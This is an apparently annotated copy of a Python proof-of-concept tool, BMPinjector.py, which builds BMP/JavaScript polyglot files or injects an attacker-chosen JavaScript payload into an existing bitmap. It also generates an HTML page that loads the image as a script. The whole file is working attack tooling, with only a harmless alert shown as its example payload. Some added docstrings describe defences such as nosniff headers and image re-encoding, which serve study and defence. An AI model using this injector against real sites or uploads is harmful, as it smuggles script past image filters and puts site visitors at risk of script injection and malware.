
BMPinjector.py

  1. #!/usr/bin/env python2
  2. #============================================================================================================#
  3. #======= Simply injects a JavaScript Payload into a BMP. ====================================================#
  4. #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
  5. #======= Author: marcoramilli.blogspot.com ==================================================================#
  6. #======= Version: PoC (don't even think to use it in development env.) ======================================#
  7. #======= Disclaimer: ========================================================================================#
  8. #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
  9. #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  10. #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  11. #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
  12. #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
  13. #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  14.                                 #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  15.                                 #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
  16. #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
  17. #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  18. #POSSIBILITY OF SUCH DAMAGE.
  19. #===========================================================================================================#
  20. import argparse
  21. import os
  22.  
  23. #---------------------------------------------------------
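def _hexify(num):
    """
    Return ``num`` as raw big-endian bytes, using the fewest whole bytes.

    The integer is formatted as hexadecimal, left-padded with a single ``0``
    when the digit count is odd, and then decoded to bytes: 255 becomes the
    single byte 0xFF and 4096 becomes the two bytes 0x10 0x00. The result is
    not padded to a fixed width, so its length depends on the magnitude of
    ``num``.
    """
    # Local import: binascii.unhexlify exists on Python 2 and 3, whereas the
    # original str.decode('hex') is Python 2 only.
    import binascii

    digits = "%x" % num
    if len(digits) % 2:
        # unhexlify needs an even number of hex digits
        digits = "0" + digits
    return binascii.unhexlify(digits)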
  32.  
  33. #---------------------------------------------------------
  34. #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
  35. #;alert(_0xe428[0]);"
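def _generate_and_write_to_file(payload, fname):
    """
    Write a BMP-shaped header followed by ``payload`` to ``fname``.

    The header is arranged so the same bytes can be read two ways. As an
    image it starts with the ``BM`` signature. As script text, the first two
    bytes of the file-size field are ASCII ``/*`` and the header ends with
    ``*/=1;``, so everything in between is a comment and the header reduces
    to ``BM=1;`` followed by whatever ``payload`` contains.

    Defensive note: such a file is only treated as script when a page loads
    it through a script element and the browser accepts the response as
    script. Serving images with their real ``Content-Type`` together with
    ``X-Content-Type-Options: nosniff``, a restrictive ``script-src`` policy,
    and parsing/re-encoding uploaded images on the server are the usual
    controls against image/script polyglots.

    Args:
        payload: data written verbatim after the header.
        fname: output path; opened with mode ``"wb"``, so an existing file
            is truncated.

    Returns:
        True, always.
    """
    # The field labels below are the original author's; they have not been
    # checked against the BMP specification.
    # The header is built before the file is opened so that a failure in
    # _hexify does not leave an empty or truncated file behind.
    header = (b'\x42\x4D'          # signature "BM"
              b'\x2F\x2A\x00\x00'  # file-size field; first two bytes are ASCII "/*"
              b'\x00\x00\x00\x00'  # reserved
              b'\x00\x00\x00\x00'  # bitmap data offset
              b'' + _hexify(len(payload)) +  # "bitmap header size": payload length, variable width
              b'\x00\x00\x00\x14'  # width (author's note: 20 pixels)
              b'\x00\x00\x00\x14'  # height (author's note: 20 pixels)
              b'\x00\x00'          # number of planes
              b'\x00\x00'          # bits per pixel
              b'\x00\x10\x00\x00'  # compression type
              b'\x00\x00\x00\x00'  # image size (author's note: ignored)
              b'\x00\x00\x00\x01'  # horizontal resolution
              b'\x00\x00\x00\x01'  # vertical resolution
              b'\x00\x00\x00\x00'  # number of colors
              b'\x00\x00\x00\x00'  # number of important colors
              b'\x00\x00\x00\x80'  # palette colors
              b'\x00\x80\xff\x80'  # palette colors
              b'\x80\x00\xff\x2A'  # palette colors; last byte is ASCII "*"
              b'\x2F\x3D\x31\x3B'  # ASCII "/=1;", completing "*/=1;"
              )
    # The context manager closes the handle even if a write raises.
    with open(fname, "wb") as out:
        out.write(header)
        out.write(payload)
    return True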
  66.  
  67. #---------------------------------------------------------
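def _generate_launching_page(f):
    """
    Write ``run.html`` in the current directory, referencing the file ``f``.

    The page references ``f`` twice: once as the source of an ``img``
    element and once as the source of a ``script`` element. ``f`` is
    concatenated into the markup as given, with no HTML escaping.

    Defensive note: the ``script`` reference is what asks the browser to
    parse the image bytes as script. Browsers that follow the Fetch standard
    refuse script responses served with an ``image/*`` content type, and
    ``X-Content-Type-Options: nosniff`` makes the server's declared type
    binding, so correct response headers on the image are the relevant
    control.

    Args:
        f: file name or URL placed in both ``src`` attributes.

    Returns:
        True, always.
    """
    # "\\>" keeps the literal backslash the original wrote as "\>" after the
    # img src attribute, without relying on an unrecognised escape sequence.
    htmlpage = """
                                <html>
                                <head><title>Opening an image</title> </head>
                                <body>
                                    <img src=\"""" + f + """\"\\>
                                    <script src= \"""" + f + """\"> </script>
                                </body>
                                </html>
                        """
    # The context manager closes run.html even if the write raises.
    with open("run.html", "wb") as html:
        html.write(htmlpage)
    return True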
  86.  
  87. #---------------------------------------------------------
def _inject_into_file(payload, fname):
    """
    Rewrite an existing BMP in place and append ``payload`` to it.

    The file is opened three times: once to read it, once to write the
    content back and overwrite two bytes at offset 2, and once to append a
    six-byte trailer followed by ``payload``. No backup of ``fname`` is made.

    The original author notes that a BMP already containing the bytes
    0xFF 0x2A might cause issues.

    Defensive note: after this runs, bytes 2-3 of the file (the start of the
    BMP file-size field) are ASCII "/*", so the declared size will generally
    no longer match the real file length, and there is extra data after the
    original image content. A validator that parses the image and re-encodes
    it discards both.

    Args:
        payload: data appended verbatim after the trailer.
        fname: path of the BMP to modify.

    Returns:
        True, always.
    """
    # Pass 1: read the whole file into memory (the author chose separate
    # open/close passes over a single in-memory rewrite).
    f = open(fname, "r+b")
    b = f.read()
    # NOTE(review): replace() returns a new object and the result is not
    # assigned, so `b` is unchanged by this line.
    b.replace(b'\x2A\x2F',b'\x00\x00')
    f.close()

    # Pass 2: "w+b" truncates the file; the content read above is written
    # back, then the two bytes at offset 2 are overwritten with 0x2F 0x2A
    # (ASCII "/*").
    f = open(fname, "w+b")
    f.write(b)
    f.seek(2,0)
    f.write(b'\x2F\x2A')
    f.close()

    # Pass 3: append 0xFF followed by ASCII "*/=1;", then the payload.
    f = open(fname, "a+b")
    f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
    f.write(payload)
    f.close()
    return True
  111.  
  112.  
  113. #---------------------------------------------------------
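if __name__ == "__main__":
    # Command-line entry point. Two positionals (output/target file name and
    # the payload text) plus a flag selecting in-place modification of an
    # existing bitmap instead of generating a new file.
    parser = argparse.ArgumentParser()
    parser.add_argument("filename", help="the bmp file name to be generated/or infected")
    parser.add_argument("js_payload", help="the payload to be injected. For exmample: \"alert(\"test\");\"")
    parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
    args = parser.parse_args()
    print("""
                    |======================================================================================================|
                    | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
                    | It is the end user's responsibility to obey all applicable local, state and federal laws.            |
                    | Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
                    |======================================================================================================|
                    """)
    if args.inject_to_existing_bmp:
        # Modifies args.filename in place; no backup copy is kept.
        _inject_into_file(args.js_payload, args.filename)
    else:
        _generate_and_write_to_file(args.js_payload, args.filename)

    # run.html is written to the current directory in both modes.
    _generate_launching_page(args.filename)
    # Call form instead of the print statement, matching the banner above;
    # the output is the same on Python 2.
    print("[+] Finished!")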